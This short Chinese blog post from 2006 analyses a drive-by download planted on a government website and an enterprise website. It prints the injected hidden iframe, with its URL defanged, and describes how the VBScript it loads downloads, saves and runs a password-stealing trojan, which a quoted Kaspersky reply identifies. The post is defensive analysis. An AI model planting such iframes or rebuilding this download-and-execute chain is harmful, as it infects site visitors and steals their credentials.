endurer 原创
2006-09-16 17:55 第2版 补充Kaspersky的回复
2006-09-16 16:55 第1版
某政府网站和某中央企业的网站首页被加入相同的代码:
/------------
<iframe height=0 width=0 src="hxxp://***object***.cnicb*.com/0**9"></iframe>
------------/
hxxp://***object***.cnicb*.com/0**9 的内容为加入多余空格的VBScript脚本代码。
该脚本代码利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 hxxp://***object**.cnicb*.com/1***5/s***.exe,保存为 %temp% 中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
test.exe 长度为31,190 字节,采用 nSPack 1.3 -> North Star/Liu Xing Ping 加壳。
主 题: | RE:APOSSIBLYINFECTED/MALWAREfile:s.exe[KLAB-1225643] | |
发件人: | "" | 发送时间:2006-09-16 17:16:54 |
Hello. New malicious software was found in the attached file. Trojan-PSW.Win32.WOW.iq It's detection will be included in the next update. Thank you for your help. ----------------- Regards, Yampolsky Boris Virus Analyst, Kaspersky Lab. |